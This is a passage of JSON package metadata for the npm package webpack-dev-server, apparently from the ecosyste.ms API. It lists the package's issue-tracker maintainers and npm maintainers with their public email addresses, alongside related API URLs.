/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/issues","maintainers":[{"login":"snitin315","count":118,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"alexander-akait","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"bjohansebas","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"rishabh3112","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anshumanv","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"mahdikhashan","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mahdikhashan"},{"login":"avivkeller","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"}],"active_maintainers":[{"login":"bjohansebas","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"alexander-akait","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"snitin315","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"avivkeller","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-dev-server/codemeta","maintainers":[{"uuid":"sokra","login":"sokra","name":null,"email":"tobias.koppers@googlemail.com","url":null,"packages_count":109,"html_url":"https://www.npmjs.com/~sokra","role":null,"created_at":"2022-11-10T11:25:48.549Z","updated_at":"2022-11-10T11:25:48.549Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sokra/packages"},{"uuid":"jhnns","login":"jhnns","name":null,"email":"mail@johannesewald.de","url":null,"packages_count":77,"html_url":"https://www.npmjs.com/~jhnns","role":null,"created_at":"2022-11-10T11:25:48.551Z","updated_at":"2022-11-10T11:25:48.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jhnns/packages"},{"uuid":"evilebottnawi","login":"evilebottnawi","name":null,"email":"sheo13666q@gmail.com","url":null,"packages_count":224,"html_url":"https://www.npmjs.com/~evilebottnawi","role":null,"created_at":"2022-11-10T11:25:48.553Z","updated_at":"2022-11-10T11:25:48.553Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/evilebottnawi/packages"},{"uuid":"hiroppy","login":"hiroppy","name":null,"email":"git@hiroppy.me","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~hiroppy","role":null,"created_at":"2022-11-10T11:25:48.555Z","updated_at":"2022-11-10T11:25:48.555Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/hiroppy/packages"},{"uuid":"ev1stensberg","login":"ev1stensberg","name":null,"email":"evenstensberg@gmail.com","url":null,"packages_count":84,"html_url":"https://www.npmjs.com/~ev1stensberg","role":null,"created_at":"2026-02-11T02:15:41.419Z","updated_at":"2026-02-11T02:15:41.419Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ev1stensberg/packages"},{"uuid":"15000621931","login":"15000621931","name":null,"email":"784487301@qq.com","url":null,"packages_count":55,"html_url":"https://www.npmjs.com/~15000621931","role":null,"created_at":"2026-02-11T02:15:41.227Z","updated_at":"2026-02-11T02:15:41.227Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/15000621931/packages"},{"uuid":"__hai","login":"__hai","name":null,"email":"haijie0619@gmail.com","url":null,"packages_count":51,"html_url":"https://www.npmjs.com/~__hai","role":null,"created_at":"2026-02-11T02:15:41.732Z","updated_at":"2026-02-11T02:15:41.732Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/__hai/packages"},{"uuid":"avivkeller","login":"avivkeller","name":null,"email":"me@aviv.sh","url":null,"packages_count":63,"html_url":"https://www.npmjs.com/~avivkeller","role":null,"created_at":"2026-03-18T02:32:01.834Z","updated_at":"2026-03-18T02:32:01.834Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/avivkeller/packages"}]}